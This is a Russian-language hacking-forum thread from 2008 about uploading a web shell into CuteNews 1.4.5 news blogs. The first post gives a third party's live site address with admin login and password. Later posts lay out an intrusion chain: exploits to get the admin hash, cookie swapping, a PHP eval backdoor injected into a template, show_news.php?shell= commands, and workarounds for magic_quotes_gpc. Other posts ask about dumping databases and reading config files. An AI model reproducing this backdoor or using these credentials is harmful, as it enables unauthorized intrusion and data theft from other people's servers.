Shell CuteNews 1.4.5 Help!

Discussion in 'Песочница' started by myrz, 10 Sep 2008.

  1. myrz

    myrz Member

    Joined:
    22 Jun 2008
    Messages:
    103
    Likes Received:
    29
    Reputations:
    0
    Всем привет!
    Вобщем возник вопрос как залить шелл в известный блог новостей (CuteNews) имея данные администратора.
    Прочитал много мануалов и эфект нулейвой может ктонить сможет если сможете можете описать как сделали это буду очень признателен :)
    Вот куда я хочу залить шелл.
    _ttp://la2.no-ip.org/news/
    Login: dsl
    Password: 79513159

    Заранее спасибо.
     
  2. Astn

    Astn New Member

    Joined:
    24 Jun 2008
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Оо у мня такаяже прабла немогу понять что нетак делаю. подскажите плиз.
     
  3. myrz

    myrz Member

    Joined:
    22 Jun 2008
    Messages:
    103
    Likes Received:
    29
    Reputations:
    0
    Дело в том что я делаю так.
    Настройкa блока новостей ->>> Редактировать шаблоны И вижу там


    Редактируйте Части Шаблона

    Активные новости
    Полная версия
    Комментарии
    Форма добавления комментариев
    Предыдущая & Следующая(новости)
    Предыдущая & Следующая(коментарий)

    Жму Активные новости

    Там открывается окошко с следущим содержанием

    Я дописываю
    Получается так

    Потом захожу из этих сылоку куданить

    Мне выдаёт ошибку мол

    Что делать ваще незнаю :(
     
    1 person likes this.
  4. myrz

    myrz Member

    Joined:
    22 Jun 2008
    Messages:
    103
    Likes Received:
    29
    Reputations:
    0
    Сайт работает и я чуствую что он даже меня переживёт (((
     
  5. myrz

    myrz Member

    Joined:
    22 Jun 2008
    Messages:
    103
    Likes Received:
    29
    Reputations:
    0
    ППЦ уже кто-то залез в админку и щас даже шаблон не отредактировать (((
     
  6. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    А ты смельчак выкладывать логин и пароль в открытый доступ..
     
  7. myrz

    myrz Member

    Joined:
    22 Jun 2008
    Messages:
    103
    Likes Received:
    29
    Reputations:
    0
    Это не мой :)))
     
  8. myrz

    myrz Member

    Joined:
    22 Jun 2008
    Messages:
    103
    Likes Received:
    29
    Reputations:
    0
    М возник еще вопрос.
    Дело в том что мне надо слить их базы.
    Даныые базы хронятся тут
    Как организовать это скажите плиз.
     
  9. n-000

    n-000 Elder - Старейшина

    Joined:
    25 Oct 2006
    Messages:
    90
    Likes Received:
    36
    Reputations:
    5
    Ты бы хотябы основы пхп и хтмл почитал... понял бы сам что к чему
     
  10. myrz

    myrz Member

    Joined:
    22 Jun 2008
    Messages:
    103
    Likes Received:
    29
    Reputations:
    0
    Мда спасибо за оригинальный ответ а поточней чёнить сказать можеш ?
     
  11. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    подключайся навикатом или каким нить скриптом типа пхпмайадмин и делай бакап
     
  12. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    :D
    Это все знают, ток проблемы от базы пасы узнать ;) :)
     
  13. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    а конфиг сложно посмотреть ? =\
     
  14. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Блин, люди, а давайте подытожим...???
    Короче с помощью сплойтов узнаем логин админа и МД5 хеш...если все зер гуд, то есть шанс двигать дальше...так???
    Дальше...подменяем куки при помощи Оперы или Мозилы, или и т.д.
    Заходим в админку CuteNews...при удачном раскладе вставляем в активные шаблоны код навроде :

    HTML;
    if(isset($_GET['shell'])) eval($_GET['shell']);

    дальше... сохраняем
    ИСПОЛЬЗУЕМ:
    _http://site/news/show_news.php?shell=phpinfo();
    _http://site/news/show_news.php?shell=system(dir);


    ПХПИНФО это конечно хорошо)...а как использовать system()???
    dir выводит...а вот system(dir c:\); уже фиг(((
    варианты: system(dir+c:\) system("dir c:\") system('dir c:\') system('dir', 'c:\') тоже не дают результата....где-то не догоняю чего-то?

    P.S. Например хочу прочитать файл config.php, тогда команда для винды будет type config.php...либо cmd /c type config.php... вобщем любые варианты со скобками и кавычками результата не дают положительного...
    Выдает ошибку примерно такую(это если кавычки использовать):
     
    #14 NamahS, 11 Nov 2008
    Last edited: 11 Nov 2008
  15. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Вобщем поискав в инете, вроде бы выходит, что все дело в том, что на серве включено magic_quotes_gpc...Обойти это как-то можно?
     
  16. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Блин, ну кто-нибудь...подскажите, как обойти вставку \ ...из-за magic_quotes_gpc=ON вместо подозрительных символов (пробел,",' и т.д.) подставляется \.Что-нибудь можно сделать вообще?
    Серв в локальной сети.Я его вижу, а у него в мою зону доступа нет и в ИНЕТ нет доступа, так что XSS не катит(.ПЛИЗ..ПОКА НЕ ПРИКРЫЛИ...
     
  17. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Спасибо, что откликнулись))))
    Я сам уже догадался...)
    Реально удовольствие от собственных побед НАМНОГО БОЛЬШЕ!!!)
     
  18. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Ну ппц :) Я ж писал уже...
    Дописываем в конце Active News:
    Заходим на http://уязвимый_сервер.ru/sk.php - и лазим по чужому компу...
    У кого не получиться пм...
     
  19. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    :) Я ж писал, что нет возможности выполнить XSS)))....Но все зер ГУД)...Через Чары проблему решил)
     
  20. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Народ не подскажете как пасс достать админа в кут нюс, эксплоит или че нить, ссылочку =)